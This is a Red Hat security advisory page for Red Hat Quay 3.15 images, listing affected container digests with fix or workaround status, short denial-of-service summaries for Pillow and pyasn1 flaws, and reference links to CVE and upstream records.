|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64 | — |
Workaround
|
A flaw was found in Pillow, a Python imaging library. A remote attacker could exploit this vulnerability by providing a specially crafted JPEG2000 image file. Due to incorrect calculation of memory requirements for image tiles, processing this file can lead to excessive memory consumption, resulting in a denial of service (DoS) through out-of-memory failures.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64 | — |
Workaround
|
A flaw was found in Pillow, a Python imaging library. This vulnerability allows an attacker to trigger controlled native heap corruption by supplying an output image whose mode does not match the transform's declared output mode when using the ImageCms.ImageCmsTransform.apply API. This can lead to a denial of service (DoS) condition, making the affected system or application unavailable.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64 | — |
Workaround
|
A flaw was found in pyasn1, a Python library for Abstract Syntax Notation One (ASN.1). The BER, CER, and DER decoders process OBJECT IDENTIFIER and RELATIVE-OID values in quadratic time relative to the number of arcs. A remote attacker could exploit this by providing a specially crafted payload containing an OID with many arcs, leading to excessive CPU consumption and a denial of service (DoS) in applications that decode untrusted ASN.1 data. The corresponding encoders also exhibit this quadratic behavior when re-encoding attacker-supplied values.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64 | — |
Workaround
|
A remote attacker can exploit this by providing specially crafted BER/CER/DER-encoded ASN.1 data with a large exponent in the REAL value. When the application subsequently prints, logs, compares, or performs arithmetic on the decoded value, this can cause excessive CPU and memory consumption, leading to a denial of service (DoS).
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64 | — |
Workaround
|
| URL | Category |
|---|---|
| https://access.redhat.com/errata/RHSA-2026:48933 | self |
| https://access.redhat.com/security/cve/CVE-2026-13149 | external |
| https://access.redhat.com/security/cve/CVE-2026-45822 | external |
| https://access.redhat.com/security/cve/CVE-2026-54058 | external |
| https://access.redhat.com/security/cve/CVE-2026-54060 | external |
| https://access.redhat.com/security/cve/CVE-2026-55379 | external |
| https://access.redhat.com/security/cve/CVE-2026-55380 | external |
| https://access.redhat.com/security/cve/CVE-2026-59197 | external |
| https://access.redhat.com/security/cve/CVE-2026-59199 | external |
| https://access.redhat.com/security/cve/CVE-2026-59200 | external |
| https://access.redhat.com/security/cve/CVE-2026-59204 | external |
| https://access.redhat.com/security/cve/CVE-2026-59205 | external |
| https://access.redhat.com/security/cve/CVE-2026-59885 | external |
| https://access.redhat.com/security/cve/CVE-2026-59886 | external |
| https://access.redhat.com/security/updates/classi… | external |
| https://security.access.redhat.com/data/csaf/v2/a… | self |
| https://access.redhat.com/security/cve/CVE-2026-13149 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2494813 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-13149 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-13149 | external |
| https://github.com/juliangruber/brace-expansion/c… | external |
| https://www.npmjs.com/package/brace-expansion | external |
| https://access.redhat.com/security/cve/CVE-2026-45822 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2494807 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-45822 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-45822 | external |
| https://github.com/SamVerschueren/decode-uri-comp… | external |
| https://github.com/SamVerschueren/decode-uri-comp… | external |
| https://www.npmjs.com/package/decode-uri-component | external |
| https://access.redhat.com/security/cve/CVE-2026-54058 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2500057 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-54058 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-54058 | external |
| https://github.com/python-pillow/Pillow/commit/6a… | external |
| https://github.com/python-pillow/Pillow/pull/9719 | external |
| https://github.com/python-pillow/Pillow/releases/… | external |
| https://github.com/python-pillow/Pillow/security/… | external |
| https://access.redhat.com/security/cve/CVE-2026-54060 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2497466 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-54060 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-54060 | external |
| https://github.com/python-pillow/Pillow/blob/main… | external |
| https://github.com/python-pillow/Pillow/commit/0a… | external |
| https://github.com/python-pillow/Pillow/security/… | external |
| https://access.redhat.com/security/cve/CVE-2026-55379 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2497452 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-55379 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-55379 | external |
| https://github.com/python-pillow/Pillow/security/… | external |
| https://access.redhat.com/security/cve/CVE-2026-55380 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2497455 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-55380 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-55380 | external |
| https://github.com/python-pillow/Pillow/commit/f3… | external |
| https://github.com/python-pillow/Pillow/security/… | external |
| https://access.redhat.com/security/cve/CVE-2026-59197 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2500043 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-59197 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-59197 | external |
| https://github.com/python-pillow/Pillow/commit/cc… | external |
| https://github.com/python-pillow/Pillow/pull/9695 | external |
| https://github.com/python-pillow/Pillow/security/… | external |
| https://access.redhat.com/security/cve/CVE-2026-59199 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2500061 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-59199 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-59199 | external |
| https://github.com/python-pillow/Pillow/commit/ce… | external |
| https://github.com/python-pillow/Pillow/pull/9703 | external |
| https://github.com/python-pillow/Pillow/security/… | external |
| https://access.redhat.com/security/cve/CVE-2026-59200 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2500060 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-59200 | external |
